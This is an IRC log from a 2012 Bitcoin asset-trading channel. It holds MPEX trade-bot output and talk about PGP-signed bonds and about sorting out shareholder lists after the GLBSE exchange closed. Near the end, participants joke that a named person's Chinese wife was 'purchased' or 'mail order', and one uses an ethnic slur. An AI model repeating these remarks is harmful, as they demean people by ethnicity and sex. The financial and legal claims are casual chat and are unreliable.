[S.MPOE] 14700 @ 0.00050341 = 7.4001 BTC [-] Nov 21 14:29:11 [MPEX] [S.MPOE] 7987 @ 0.0005032 = 4.0191 BTC [-] Nov 21 14:30:34 well, whats wrong with doing bonds with maturity dates like 5 years from now? Nov 21 14:35:38 [MPEX] [S.MPOE] 20650 @ 0.00050511 = 10.4305 BTC [+] Nov 21 14:38:06 bonds are usually based on something. Nov 21 14:38:16 junk bonds i guess. it's how las vegas was built. Nov 21 14:38:30 yeah, but we need something Nov 21 14:38:42 digitally signed bonds could work Nov 21 14:39:05 like, people buy them, I send them a pgp signed blob Nov 21 14:39:19 and then they can sell them to other people if they want Nov 21 14:39:34 and whoever has them by the date of maturity can send them back to me for payment Nov 21 14:40:04 no need for an exchange in any real sense Nov 21 14:42:13 mircea_popescu: so Im thinking a non-callable zero-coupon bond Nov 21 14:42:19 makes it nice and simple Nov 21 14:45:13 what sense does that make ? he who sent the blob can still claim on it Nov 21 14:49:09 [MPEX] [S.MPOE] 24658 @ 0.00050511 = 12.455 BTC [+] Nov 21 14:49:11 [MPEX] [S.MPOE] 19292 @ 0.0005052 = 9.7463 BTC [+] Nov 21 14:55:52 mircea_popescu: yeah, but they'd need to also pgp sign it notating who it was sent to Nov 21 14:56:45 that'll be fun, if one blob makes it through 50-100 people. Nov 21 14:57:40 [MPEX] [S.MPOE] 29529 @ 0.00050432 = 14.8921 BTC [-] Nov 21 14:57:42 [MPEX] [S.MPOE] 18371 @ 0.0005032 = 9.2443 BTC [-] Nov 21 14:57:51 well, it wouldnt be a problem Nov 21 14:58:04 you'd sign the signed message to do it Nov 21 14:58:29 so I'd just write a sh script that just keeps running pgp over and over Nov 21 14:58:36 stripping away each layer Nov 21 14:59:12 yeah Nov 21 14:59:34 kinda makes it hard for the 50th user to see if the thing he's being sold is valid. Nov 21 14:59:42 esp if he can't write code. Nov 21 14:59:52 I'd just put a page up somewhere that does it Nov 21 15:00:10 that may be worth doing just on general principle. Nov 21 15:00:11 upload your text file, it recursively pgps Nov 21 15:00:25 it'd be a decent utility to have in general. Nov 21 15:00:31 heh bitstamp yea Nov 21 15:00:34 its a good bait Nov 21 15:00:47 i know im safe as long nobody is going after them Nov 21 15:00:50 actually, I wonder if pgp already can recursively check Nov 21 15:00:58 not afaik Nov 21 15:01:01 kakobreklaaa how do you mean ? Nov 21 15:01:14 well Nov 21 15:01:54 if someone sticks a nose in and tries to tax em or whatever simmilar Nov 21 15:02:02 i will smell trouble before it hits me Nov 21 15:02:09 [MPEX] [S.MPOE] 1742 @ 0.0005032 = 0.8766 BTC [-] Nov 21 15:02:11 [MPEX] [S.MPOE] 5960 @ 0.00050307 = 2.9983 BTC [-] Nov 21 15:02:12 [MPEX] [S.MPOE] 22898 @ 0.00050307 = 11.5193 BTC [-] Nov 21 15:02:32 same country and shit Nov 21 15:02:45 and there is no regulation about it ofc. Nov 21 15:02:59 yeah, I dont think I have to worry about legal regulations on issuing these bonds Nov 21 15:03:20 well bitstamp is operating with eur and usd Nov 21 15:03:35 o, they're in slovakia ? Nov 21 15:03:41 slovenia Nov 21 15:03:44 a a sorry. Nov 21 15:04:09 its up to the bond holder to report his taxes, right? Nov 21 15:04:16 remember, i was at that connference in slovenia Nov 21 15:04:20 where they showed up Nov 21 15:04:24 kids Nov 21 15:05:30 hrm hey mircea_popescu Nov 21 15:05:32 o yea. Nov 21 15:05:39 you do pass through shit on mpex right? Nov 21 15:05:54 depends what you mean by that. Nov 21 15:06:32 well like, what would stop you from buying, say, 50 thousand bonds, and then issuing 50 thousand shares of passthrough? Nov 21 15:07:20 stop me ? nothing'd stop me. Nov 21 15:07:23 i am unstoppable. Nov 21 15:07:39 you know what I mean though Nov 21 15:07:45 not rly ? Nov 21 15:07:56 well, would it be a viable way of doing this Nov 21 15:08:05 multiple exchanges could trade the bonds as passthrough shares Nov 21 15:08:27 so no need to do massive pgp chains since they'd never exit the exchange Nov 21 15:08:46 in principle. Nov 21 15:09:09 I like the multiple exchange part Nov 21 15:10:14 whole pgp chain thing has one problem, i can send the same bonds properly signed to two different people Nov 21 15:10:26 how do they verify no one other has them? Nov 21 15:10:42 jurov: they cant. Nov 21 15:11:40 moving to that exchange level doesn't really solve that. the exchanges must trust each other anyway Nov 21 15:12:23 well, the exchanges probably wouldnt buy or sell them beyond the initial asset creation Nov 21 15:13:14 "probably"... even if they are honest, what if clients want to do arbitrage? Nov 21 15:13:43 assets do not need to have that. Nov 21 15:15:25 orly? you say that like we exhausted all options, that is not the case. you can look into opentransactions or colored coins maybe. Nov 21 15:15:47 [MPEX] [S.MPOE] 19508 @ 0.0005052 = 9.8554 BTC [+] Nov 21 15:15:48 [MPEX] [S.MPOE] 18795 @ 0.00050531 = 9.4973 BTC [+] Nov 21 15:15:48 hrm Nov 21 15:15:49 [MPEX] [S.MPOE] 22100 @ 0.00050542 = 11.1698 BTC [+] Nov 21 15:15:50 [MPEX] [S.MPOE] 24426 @ 0.00050542 = 12.3454 BTC [+] Nov 21 15:15:50 actually Nov 21 15:16:00 I wonder if you COULD do a bitcoin chain that does bonds Nov 21 15:19:23 i'm bond, bitcoin bond. Nov 21 15:19:37 no mr bond, I want you to die. Nov 21 15:19:46 :( Nov 21 15:19:57 lol Nov 21 15:21:18 [MPEX] [S.MPOE] 21183 @ 0.00050542 = 10.7063 BTC [+] Nov 21 15:21:20 [MPEX] [S.MPOE] 13800 @ 0.00050561 = 6.9774 BTC [+] Nov 21 15:21:21 [MPEX] [S.MPOE] 7843 @ 0.00050996 = 3.9996 BTC [+] **** ENDING LOGGING AT Wed Nov 21 15:40:27 2012 **** BEGIN LOGGING AT Wed Nov 21 15:41:13 2012 Nov 21 15:45:15 s.mpoe whooops Nov 21 15:47:32 [MPEX] [S.MPOE] 31215 @ 0.00051319 = 16.0192 BTC [+] Nov 21 15:52:03 did i miss something ? Nov 21 15:52:19 jeez it's heating up isnt it. Nov 21 15:52:56 [MPEX] [S.MPOE] 4220 @ 0.00051319 = 2.1657 BTC [+] Nov 21 15:52:57 [MPEX] [S.MPOE] 909 @ 0.00051143 = 0.4649 BTC [-] Nov 21 15:56:13 [MPEX] [S.MPOE] 41100 @ 0.00050367 = 20.7008 BTC [-] Nov 21 15:56:14 [MPEX] [S.MPOE] 9155 @ 0.00050307 = 4.6056 BTC [-] Nov 21 15:59:20 i wonder if colored coins are racist. Nov 21 16:02:07 [MPEX] [S.MPOE] 8400 @ 0.00051 = 4.284 BTC [+] Nov 21 16:48:07 [MPEX] [S.MPOE] 14850 @ 0.00050604 = 7.5147 BTC [-] Nov 21 16:57:22 [MPEX] [S.MPOE] 43000 @ 0.00051 = 21.93 BTC [+] Nov 21 17:02:52 [MPEX] [S.MPOE] 12000 @ 0.00050604 = 6.0725 BTC [-] Nov 21 17:11:32 [MPEX] [S.MPOE] 7306 @ 0.00050371 = 3.6801 BTC [-] Nov 21 17:11:33 [MPEX] [S.MPOE] 12576 @ 0.00050307 = 6.3266 BTC [-] Nov 21 17:14:58 [MPEX] [S.MPOE] 6380 @ 0.00050307 = 3.2096 BTC [-] Nov 21 17:15:10 [MPEX] [S.MPOE] 19270 @ 0.00050303 = 9.6934 BTC [-] Nov 21 17:28:31 [MPEX] [S.MPOE] 26859 @ 0.00050303 = 13.5109 BTC [-] Nov 21 17:28:33 [MPEX] [S.MPOE] 8841 @ 0.0005027 = 4.4444 BTC [-] Nov 21 17:42:22 [MPEX] [S.MPOE] 9400 @ 0.00050526 = 4.7494 BTC [+] Nov 21 17:42:28 [MPEX] [S.MPOE] 32450 @ 0.00051 = 16.5495 BTC [+] Nov 21 17:49:13 case you missed it https://bitcointalk.org/index.php?topic=127096.0 Nov 21 17:51:41 does he really have this much free time on his hands? Nov 21 17:51:41 amazing Nov 21 17:52:00 http://www.youtube.com/watch?v=SL_azA78Hi0 Nov 21 17:52:22 [MPEX] [S.MPOE] 11234 @ 0.0005027 = 5.6473 BTC [-] Nov 21 18:09:23 [MPEX] [S.MPOE] 7375 @ 0.0005027 = 3.7074 BTC [-] Nov 21 18:09:23 [MPEX] [S.MPOE] 18125 @ 0.00050234 = 9.1049 BTC [-] Nov 21 18:16:47 [MPEX] [S.MPOE] 20800 @ 0.00050234 = 10.4487 BTC [-] Nov 21 18:29:49 OH SHIT THIS CHANNEL STILL EXISTS> Nov 21 18:30:46 haha Nov 21 18:32:05 what exactly is a bitcoin asset these days Nov 21 18:36:46 milk Nov 21 18:37:02 i love milk! Nov 21 18:39:28 [MPEX] [S.MPOE] 20800 @ 0.00050349 = 10.4726 BTC [+] Nov 21 18:39:44 !ticker S.MPOE Nov 21 18:39:46 [MPEX:S.MPOE] 1day: 0.00050234 / 0.00050439 / 0.00051319 (3404908 shares, 1,717.41 BTC), 30day: 0.00042823 / 0.00048447 / 0.00051331 (60966128 shares, 29,536.68 BTC) Nov 21 18:40:52 !ticker S.BVPS Nov 21 18:40:55 [MPEX:S.BVPS] 1day: 0.00280004 / 0.00280004 / 0.00280004 (3300 shares, 9.24 BTC), 30day: 0.002 / 0.00230086 / 0.0032491 (38016 shares, 87.47 BTC) Nov 21 18:42:15 i found this old starman script for BitchX that only rg could run anymore lol Nov 21 18:42:29 did he ever turn up? Nov 21 18:43:12 ;;tell rg i've got a starman for you Nov 21 18:43:23 awe Nov 21 18:43:30 ;;later tell rg i've got a starman for you Nov 21 18:43:30 The operation succeeded. Nov 21 18:49:12 [MPEX] [S.MPOE] 51690 @ 0.00050625 = 26.1681 BTC [+] Nov 21 18:57:20 [MPEX] [S.MPOE] 16600 @ 0.00050758 = 8.4258 BTC [+] Nov 21 18:57:22 [MPEX] [S.MPOE] 7850 @ 0.00051 = 4.0035 BTC [+] Nov 21 18:58:56 [MPEX] [S.MPOE] 4860 @ 0.00050662 = 2.4622 BTC [-] Nov 21 19:09:29 [MPEX] [S.MPOE] 7631 @ 0.00050488 = 3.8527 BTC [-] Nov 21 19:14:18 ;;calc (13,445 - 8,203 - 2,071 - 402) / 100,000,000 / 0.00339922 Nov 21 19:14:18 Error: Something in there wasn't a valid number. Nov 21 19:14:35 ;;calc (13445 - 8203 - 2071 - 402) / 100000000 / 0.00339922 Nov 21 19:14:36 0.00814598643218 Nov 21 19:16:15 [MPEX] [S.MPOE] 31009 @ 0.00050488 = 15.6558 BTC [-] Nov 21 19:16:16 [MPEX] [S.MPOE] 2026 @ 0.00051 = 1.0333 BTC [+] Nov 21 19:16:51 http://blog.smickles.com/bitcoin/bitcoin-finance/a-good-month-for-s-dice-shareholders-in-the-making/#update_2_21nov12 <<< for which I just ran the calc ;) Nov 21 19:18:08 smickles, what about mpoe shareholders? Nov 21 19:18:50 i suspect we're in a very nice surprise :p Nov 21 19:20:45 jurov: oh? yeah, not that I have a good grasp on the situation (i've just casually paid attention), but so long as the exchange rate doesn't go above 13.3 (or something like that) mpoe should have a good dividend. but i could be entirely wrong :D Nov 21 19:25:29 so really nobody's watching mircea closely? Nov 21 19:28:02 jurov: I'd have to setup a script to monitor things, I've only been noticing the large orders and haven't done an exact calculation. But it would be limited by the fact that it would be difficult to distinguish mircea_popescu's bot, from other's adding liquidity Nov 21 19:28:23 forenoon DeaDTerra Nov 21 19:28:35 [MPEX] [S.MPOE] 17250 @ 0.00051 = 8.7975 BTC [+] Nov 21 19:28:47 smickles, you wanted to set up your own bot, so i guessed you'd have some grasp Nov 21 19:29:36 jurov: i'm working on that bot still, i'll probably launch it afther this coming last friday (when i have more capital to work with ;) Nov 21 19:30:07 ;;ticker Nov 21 19:30:08 BTCUSD ticker | Best bid: 11.70101, Best ask: 11.73969, Bid-ask spread: 0.03868, Last trade: 11.70101, 24 hour volume: 20219.34455426, 24 hour low: 11.60241, 24 hour high: 11.78400, 24 hour vwap: 11.70969 Nov 21 19:30:44 i'm looking at a 17% gain at the current rates, c'mon stability! Nov 21 19:31:49 similar here, although somwheat less.. now if someone could buy these C120T's Nov 21 19:32:56 heh, didj'a lower you price yet? Nov 21 19:33:51 what price do you consider acceptable? Nov 21 19:35:35 0.09 ? Nov 21 19:36:22 [MPEX] [S.MPOE] 20000 @ 0.00051 = 10.2 BTC [+] Nov 21 19:39:53 jurov: heh, my spreadsheet is telling me 0.02040816 Nov 21 19:40:33 i expect that's lower than mircea's bot Nov 21 19:40:43 C110T sells at 0.25, C130T at 0.06.. market Nov 21 19:40:49 is thinking differently Nov 21 19:41:19 mircea's bot gave up on these :p Nov 21 19:43:44 giving btc to a bot feels like playing with fire Nov 21 19:43:52 or liquid hydrogen Nov 21 19:45:32 speaking of bots, im just backtesting freshly baked robot based on kalman filters Nov 21 19:46:25 [MPEX] [S.MPOE] 35700 @ 0.00051 = 18.207 BTC [+] Nov 21 19:49:24 kakobrekla: do you have a db of mpex trades? Nov 21 19:51:05 I've been meaning to setup a good one for myself, and was wondering how far back the twiter feed goes Nov 21 19:52:28 nope i dont keep one Nov 21 19:52:37 assbot doesnt log it Nov 21 19:53:13 smickles, i have db since start of november Nov 21 19:54:24 and python rss reader that updates it also, i don't trust twatter for this Nov 21 19:57:03 [MPEX] [S.MPOE] 41300 @ 0.00051 = 21.063 BTC [+] Nov 21 20:05:34 I got the list of assets for BTC-Mining Nov 21 20:05:39 https://docs.google.com/spreadsheet/ccc?key=0AvwwyRGyc1WgdDFUajZmcWtQc2xVZUlGNXBvbWg1ZXc Nov 21 20:06:09 Check the list and see if you are included. Only the first 3 characters of email and BTC address are included Nov 21 20:09:28 There's 475 unclaimed shares so far on 2369 shares sold. Nov 21 20:09:57 That's 1/5th Nov 21 20:09:59 It's a lot. Nov 21 20:10:14 Hello Gigavps Nov 21 20:10:28 hello Nov 21 20:10:35 anything exciting happening? Nov 21 20:10:45 It seems nefario is sending further asset lists Nov 21 20:10:52 that is good Nov 21 20:10:54 I just received the one for BTC-Mining Nov 21 20:10:55 gigavps: you got your asset list? :D Nov 21 20:11:10 i have received a partial list Nov 21 20:11:16 fun Nov 21 20:11:26 I'm missing 1/5th of shares to be claimed. Nov 21 20:11:35 can't wait till people start to make claims and aren't on the list Nov 21 20:11:45 then what do you do? Nov 21 20:12:15 I guess the missing ones are from people who refused to give info? Nov 21 20:12:23 Maybe Nov 21 20:13:29 Odd that I'm not on your list Gigavps. My list contains my address and my email Nov 21 20:13:29 i got some more today Nov 21 20:13:54 Ah, would 18CoGAeLJzwG3iLkBj1vARYDWW7eC7qUQ1 be included this time? Nov 21 20:15:32 nope Nov 21 20:16:10 =/ Nov 21 20:16:18 [MPEX] [S.MPOE] 18400 @ 0.00050811 = 9.3492 BTC [-] Nov 21 20:16:20 [MPEX] [S.MPOE] 27150 @ 0.00050629 = 13.7458 BTC [-] Nov 21 20:16:21 [MPEX] [S.MPOE] 2850 @ 0.00050488 = 1.4389 BTC [-] Nov 21 20:16:25 this is a problem Nov 21 20:16:44 that i have yet to hear a solid way to solve it Nov 21 20:17:29 It's odd. Nov 21 20:17:33 My list seems to be accurate and contain users I was expecting to hold the amount of shares shown Nov 21 20:17:57 I recognize a few bitcointalk.org users too. Nov 21 20:20:30 [MPEX] [S.MPOE] 12500 @ 0.00050488 = 6.311 BTC [-] Nov 21 20:21:47 wasn't email required to glbse registration? Nov 21 20:24:10 and a rock with multiple pairs of eyes glowing from the darkness under labeled "issuers" could be seen somewhere in Bitcoinland. Nov 21 20:26:08 the fun is just beginning Nov 21 20:26:10 Aye Nov 21 20:28:48 < Namjies> https://docs.google.com/spreadsheet/ccc?key=0AvwwyRGyc1WgdDFUajZmcWtQc2xVZUlGNXBvbWg1ZXc Nov 21 20:28:58 i can guess who line 31 is Nov 21 20:29:55 Aye, but my shares amount was public Nov 21 20:30:09 on the BTC-BOND spreadsheet Nov 21 20:31:52 I think the 300 shares is also guessable. I believe that's usagi which had that amount in his spreadsheet for BMF. Nov 21 20:32:27 [MPEX] [S.MPOE] 22935 @ 0.00050845 = 11.6613 BTC [+] Nov 21 20:32:28 [MPEX] [S.MPOE] 56780 @ 0.00051 = 28.9578 BTC [+] Nov 21 20:38:45 responded to btc-mining thread Nov 21 20:38:52 gigavps: I am finding gaps in what I received from GLBSe versus user submitted claims to me Nov 21 20:39:26 of primary concern are submitted claims from people i would trust Nov 21 20:39:40 and no reference in the GLBSE data Nov 21 20:39:50 How many shares did you have? Nov 21 20:39:56 ;;bc,stats Nov 21 20:40:04 Current Blocks: 208949 | Current Difficulty: 3368767.1405329 | Next Difficulty At Block: 209663 | Next Difficulty In: 714 blocks | Next Difficulty In About: 4 days, 22 hours, 12 minutes, and 24 seconds | Next Difficulty Estimate: 3374381.13210326 | Estimated Percent Change: 0.166648252496 Nov 21 20:40:04 [MPEX] [S.MPOE] 17700 @ 0.00050488 = 8.9364 BTC [-] Nov 21 20:40:05 [MPEX] [S.MPOE] 6200 @ 0.00050349 = 3.1216 BTC [-] Nov 21 20:40:06 [MPEX] [S.MPOE] 13125 @ 0.00050234 = 6.5932 BTC [-] Nov 21 20:40:07 [MPEX] [S.MPOE] 5475 @ 0.00050228 = 2.75 BTC [-] Nov 21 20:40:17 YABMC has 54,278 outstanding Nov 21 20:40:37 Namjies: 100 Nov 21 20:40:55 Hmm Nov 21 20:40:55 midnightmagic: heh, why the poke to 'em? Nov 21 20:40:58 ahh - sorry - missed you were speaking with Diablo-D3 Nov 21 20:42:01 Well there's 1/5th of shares unclaimed. Nov 21 20:42:01 It's a surprisingly large amount Nov 21 20:42:01 So I guess the list are partial. Nov 21 20:42:01 Diablo-D3: https://dl.dropbox.com/u/3832397/Photos/2012/August/2012-08-26-031510.jpg Nov 21 20:42:01 smickles: I poke everybody.. Nov 21 20:42:01 ask Nov 21 20:42:04 er Nov 21 20:42:04 Azelphur: what tablet is that? a nexus 7? Nov 21 20:42:06 ack Nov 21 20:42:09 Diablo-D3: yep :P Nov 21 20:42:10 :-) Nov 21 20:42:24 Azelphur: I find it ironic they went with the phone ui on that Nov 21 20:42:29 Diablo-D3: and here I was thinking you'd ask about the hat Nov 21 20:42:31 Ive seen the photo before Nov 21 20:42:39 I just forgot what the tablet was Nov 21 20:42:39 yea, it is odd, there's builds of cyanogenmod with tablet mode enabled Nov 21 20:42:45 I know, I was just reminding you how much you love ubuntu :P Nov 21 20:42:59 I can do either phone ui or tablet ui on my kindle fire Nov 21 20:43:11 phone ui just doesnt work with a screen that big Nov 21 20:43:21 yea, it's odd Nov 21 20:43:28 still, cyanogenmod fixes all the things Nov 21 20:43:29 its hard to hit centered buttons in landscape mode, and having to drag down half the fucking screen to get notifications sucks Nov 21 20:43:32 yeah Nov 21 20:43:41 tablet ui + forced tablet ui in apps == delicious Nov 21 20:44:10 And you are 100% no shares were sold before GLBSE's closure and that the box agreeing to share info was ticked? Nov 21 20:44:35 Namjies: yes, I had no sell orders up for assets Nov 21 20:44:42 Namjies: and I was emailed by glbse saying whatever Nov 21 20:45:22 Okay. Well I'll try to at least get confirmation for most of the rest of the list. Nov 21 20:45:43 Can you PM me your email and BTC address used? I'll keep track of external claims. Nov 21 20:46:36 there Nov 21 20:46:50 thanks Nov 21 20:53:45 [MPEX] [S.MPOE] 16250 @ 0.00051 = 8.2875 BTC [+] Nov 21 20:55:12 I suspect that 1/3 are mostly holding a few shares. Most big accounts seems to have claimed. Nov 21 20:55:25 They might claim in the following few months tho Nov 21 20:55:40 Not sure how long Nefario will accept claims. Nov 21 20:57:37 Ah, could it be it? Have you received a double payment that was not returned, Diablo-D3? Nov 21 20:58:36 oh no Nov 21 20:58:44 i bet nefario could easily claim that Nov 21 20:58:50 even if untrue Nov 21 20:58:59 and peeps wouldn't have recourse Nov 21 20:59:15 Namjies: nope Nov 21 20:59:32 Dammit... Nov 21 20:59:37 smickles: no, because we can just look at addresses on block explorer Nov 21 21:00:17 Diablo-D3: he could just use any address which was sent a payment in that timeframe and still has funds at it Nov 21 21:00:22 We can hardly check if your GLBSE payment existed/was doubled/was repaid. Nov 21 21:00:47 Namjies: true, but then hes going to have to falsify asset lists Nov 21 21:00:56 or even if it does't have funds at it too Nov 21 21:00:57 seeing as the money he sent me was the entire balance of DIBFLSC Nov 21 21:01:15 Diablo-D3: point is, witholding shareholder data for that reason is bad Nov 21 21:01:24 smickles: yes Nov 21 21:03:29 [MPEX] [S.MPOE] 43250 @ 0.00051 = 22.0575 BTC [+] Nov 21 21:03:47 dun dun duuun Nov 21 21:04:51 Namjies, smickles: I dont like the fact I havent gotten lists for dmc or dibflsc Nov 21 21:05:19 i haven't gotten lists for s²cm or mpoe etf yet :( Nov 21 21:05:55 brb rebooting laptop Nov 21 21:06:07 I haven't received the s²cm btceither Nov 21 21:06:11 he said he'd send a few lists daily Nov 21 21:06:18 Usagi Nov 21 21:06:47 Can you confirm you're on my BTC-MINING lists? Nov 21 21:06:47 https://docs.google.com/spreadsheet/ccc?key=0AvwwyRGyc1WgdDFUajZmcWtQc2xVZUlGNXBvbWg1ZXc#gid=0 Nov 21 21:06:56 I think line 17 is you. Nov 21 21:07:28 match the BTC-Mining shares BMF held if I'm not mistaken Nov 21 21:08:02 Good. Nov 21 21:12:24 [MPEX] [S.MPOE] 6000 @ 0.00051 = 3.06 BTC [+] Nov 21 21:15:31 kakobrekla: with that algo, after you run the backtest, is the error estimate really fricken' low? Nov 21 21:20:27 smickles the filter is used to trigger trading decision delivered from an input which in currently is velocity Nov 21 21:20:41 [MPEX] [S.MPOE] 5325 @ 0.00050228 = 2.6746 BTC [-] Nov 21 21:20:43 [MPEX] [S.MPOE] 22500 @ 0.00050213 = 11.2979 BTC [-] Nov 21 21:20:44 [MPEX] [S.MPOE] 17565 @ 0.00050181 = 8.8143 BTC [-] Nov 21 21:28:45 back Nov 21 21:40:52 note to self Nov 21 21:40:55 dont use gl on laptop Nov 21 21:45:32 [MPEX] [S.MPOE] 18300 @ 0.00051 = 9.333 BTC [+] Nov 21 21:57:11 https://isc.sans.edu/diary.html?n&storyid=14548 Nov 21 21:57:24 this was momentarily confusing Nov 21 22:15:40 [MPEX] [S.MPOE] 44900 @ 0.00050315 = 22.5914 BTC [-] Nov 21 22:31:48 usagi, what is your fkn problem? are all shares accounted for (have a known owner)? Nov 21 22:33:20 [MPEX] [S.MPOE] 10955 @ 0.00050315 = 5.512 BTC [-] Nov 21 22:33:22 [MPEX] [S.MPOE] 13045 @ 0.00050268 = 6.5575 BTC [-] Nov 21 22:37:27 What is the issue EskimoBob? Nov 21 22:38:02 [MPEX] [S.MPOE] 2755 @ 0.00050268 = 1.3849 BTC [-] Nov 21 22:38:02 [MPEX] [S.MPOE] 2485 @ 0.00050181 = 1.247 BTC [-] Nov 21 22:38:04 [MPEX] [S.MPOE] 36750 @ 0.00050138 = 18.4257 BTC [-] Nov 21 22:38:05 [MPEX] [S.MPOE] 4782 @ 0.00050094 = 2.3955 BTC [-] Nov 21 22:38:47 Oh I see... Nov 21 22:38:54 Usagi claims you lied... Nov 21 22:39:06 Well Usagi should know the lists are not complete Nov 21 22:39:26 and since he has unclaimed shares, you could have 9 in those. Nov 21 22:45:23 i sent a e-mail to nefario. Lets see if he answers. Maybe he sent me twice those pennies I had over there and I never noticed. Nov 21 22:45:49 [MPEX] [S.MPOE] 7237 @ 0.00051 = 3.6909 BTC [+] Nov 21 22:53:47 Possible. Nov 21 23:00:20 you didn't use a clean wallet? Nov 21 23:11:24 Many didn't Nov 21 23:11:35 If you looked at payment claims thread. Nov 21 23:14:22 would have thought it sensible with the rumours about nefario getting tipped out by the feds Nov 21 23:17:35 [MPEX] [S.MPOE] 38790 @ 0.0005082 = 19.7131 BTC [-] Nov 21 23:17:37 [MPEX] [S.MPOE] 9760 @ 0.00051 = 4.9776 BTC [+] Nov 21 23:25:49 [MPEX] [S.MPOE] 11500 @ 0.0005036 = 5.7914 BTC [-] Nov 21 23:49:45 [MPEX] [S.MPOE] 22400 @ 0.0005036 = 11.2806 BTC [-] Nov 21 23:49:47 [MPEX] [S.MPOE] 28738 @ 0.00050319 = 14.4607 BTC [-] Nov 22 00:08:27 [MPEX] [S.MPOE] 14050 @ 0.00050563 = 7.1041 BTC [+] Nov 22 00:28:15 smickles, "dangerous, risky, or even illegal"? Nov 22 00:41:41 Depending on local regulations Nov 22 00:42:37 i commented on that. did any institution in US/UK officially proclaim bitcoin securities illegal? Nov 22 00:42:44 afaik no so far Nov 22 00:43:42 *unlicensed bitcoin securities to be exact (although i doubt there are any licensed) Nov 22 00:44:26 jeez that's a lot to read up Nov 22 00:44:35 well, thats why I want to go the bond route Nov 22 00:44:41 bonds dont need to be registered with the SEC Nov 22 00:46:47 MPOE-PR, EskimoBob, Puppet, Deprived. Etc. -- Fraud and Conspiracy Nov 22 00:46:49 that's cute. Nov 22 00:46:59 whatever happened to puppet? Nov 22 00:47:11 I havent seen him trolling around lately Nov 22 00:47:21 did it come out that he was nefario's puppet? Nov 22 00:49:42 and no reference in the GLBSE data <<< ouch Nov 22 00:49:49 tbh i was kinda expecting that ;/ Nov 22 00:49:54 [MPEX] [S.MPOE] 21147 @ 0.00050955 = 10.7755 BTC [+] Nov 22 00:50:37 expecting what? Nov 22 00:50:47 mircea_popescu: it seems either some people did not fill in the GLBSE claim or they are in a dispute over BTC paid out and nefario is holding their assets "hostage" Nov 22 00:50:55 that Namjies Nov 22 00:51:02 aye Nov 22 00:51:05 yeah, what a fucker Nov 22 00:51:30 so - we wait a while longer Nov 22 00:51:36 basically, "partial lists" is the only thing that's worse than both "lists" and "no lists" Nov 22 00:51:37 It's pretty much the only tool he has to force people to send back double payments. Nov 22 00:51:41 nefario has a knack. Nov 22 00:52:02 I find partial list better than no list Nov 22 00:52:17 I was able to match up some claims Nov 22 00:52:24 maybe 50% of ouytstanding shares Nov 22 00:52:37 Namjies maybe you get lucky. what JWU42 is describing is a prime rate nightmare. Nov 22 00:52:50 that is, matching a submitted claim to me via e-mail with GLBSE data Nov 22 00:52:53 from gigavps' tight lippedness i infer he's in a similar situation Nov 22 00:52:57 possibly not to the degree Nov 22 00:53:07 why would we send back double payments? Nov 22 00:53:18 why would you not? Nov 22 00:53:21 dub because it was a shared mistake Nov 22 00:53:26 thats an "im a fucking moron its coming out of my own pocket" scenario Nov 22 00:53:26 he send the payment, you provided the address. Nov 22 00:53:27 Because you don't own the extra funds? Nov 22 00:53:41 insanyjoel logic. Nov 22 00:53:53 I guess there is enough hatred of nef that users vview it as an asshole tax on nef Nov 22 00:54:08 yeah, was about to say idiot tax Nov 22 00:54:31 If he can't pay users without those double payments back tho, it harms the innocent users tho. Nov 22 00:54:49 Namjies i dont understand where you figure he gets the empire to fuck with the issuers Nov 22 00:54:54 to make up for his own stupidity. Nov 22 00:54:56 he can though sell his house, return his wife to the website for refund etc Nov 22 00:55:07 this is like me running my car into a wall and then destroying the person's wall to extract my car. Nov 22 00:55:19 I'm not saying it's right. Nov 22 00:55:27 Technically, the info is not his. Nov 22 00:55:44 I'm just saying he probably went for it because it was the only option he could leverage. Nov 22 00:56:03 to head off any idiocy, i didnt receive a double payment (nor a single one) Nov 22 00:56:28 return his wife for... >.> Nov 22 00:56:51 I'm almost certain he didn't buy his wife. Nov 22 00:57:05 can't argue with you there, he has a hefty history of doing stupid shit to compensate for other stupid shit Nov 22 00:57:19 englishman with chinawife == purchased Nov 22 00:57:41 dub you ever seen the film with foster ? Nov 22 00:57:48 nono, kidman not foster Nov 22 00:58:05 dead calm is the only kidman film I rate Nov 22 00:58:06 22:28 < jurov> smickles, "dangerous, risky, or even illegal"? <<< I did say '..could be..' Nov 22 00:58:25 oh I see... so I guess everyone who is in a couple with an asian foreigner has purchased the girl... Nov 22 00:58:34 http://www.imdb.com/title/tt0188453/ try that. her russian accent is delicious. Nov 22 00:58:46 Namjies: usually Nov 22 00:58:46 I don't see how you can infer it must have been purchased... Nov 22 00:59:01 Namjies i'll have you know anyone married in romania has bought the wife. Nov 22 00:59:04 i mean that literally. Nov 22 00:59:14 they have a little ceremony at the wedding, people steal her off Nov 22 00:59:18 groom buys her back Nov 22 00:59:23 it may not be a traditional cash exchange, sex/pretend love for citizenship works as well Nov 22 00:59:40 Well if it's customary for the groom to buy his wife... Nov 22 01:00:15 dub why'd she want british citizenship ? she's not paki, she's chinese. Nov 22 01:00:52 probably cash for mail order then Nov 22 01:01:03 and Nefario was in China recently visiting her family with her or so he claimed... Nov 22 01:01:14 i wonder if he salted the soup Nov 22 01:01:19 That doesn't sound like a mail order... Nov 22 01:01:37 probably to arrange immigration documents Nov 22 01:02:08 Fine, fine, believe whatever you want. But I'm not buying that theory Nov 22 01:03:10 Namjies he's just trolling. Nov 22 01:06:07 That may be. Nov 22 01:09:29 So far so good however. Nov 22 01:09:43 Most claims are matching my list. Nov 22 01:10:28 https://bitcointalk.org/index.php?topic=127149.0 Nov 22 01:10:32 and it already begins. Nov 22 01:13:24 https://bitcointalk.org/index.php?topic=127149.msg1350181#msg1350181 << i enjoyed the response Nov 22 01:13:45 "you dim witted hysterical fuck" Nov 22 01:14:34 "paint a dim witted hysterical fuck. you have two hours and may only use white and burnt sienna" Nov 22 01:14:44 lol Nov 22 01:15:35 *getting reamed by an anon Nov 22 01:17:14 Ah, well maybe others didn't have as much luck as me. Nov 22 01:21:02 Current claims: https://docs.google.com/spreadsheet/ccc?key=0AvwwyRGyc1WgdDFUajZmcWtQc2xVZUlGNXBvbWg1ZXc&pli=1#gid=0 Nov 22 01:21:46 1 unofficial claim so far, many not confirmed yet, many claims confirmed by a user on bitcointalk Nov 22 01:22:04 how can a user on bitcointalk confirm a claim ? Nov 22 01:22:41 By looking at spreadsheet and confirming the amount of shares is correct/email/btc address Nov 22 01:22:41 sign a message with the address? Nov 22 01:23:23 Strictly looking to get each line I received associated with an actual, preexisting user. Nov 22 01:23:29 ;;rewardhalf Nov 22 01:23:30 Error: "rewardhalf" is not a valid command. Nov 22 01:23:34 er Nov 22 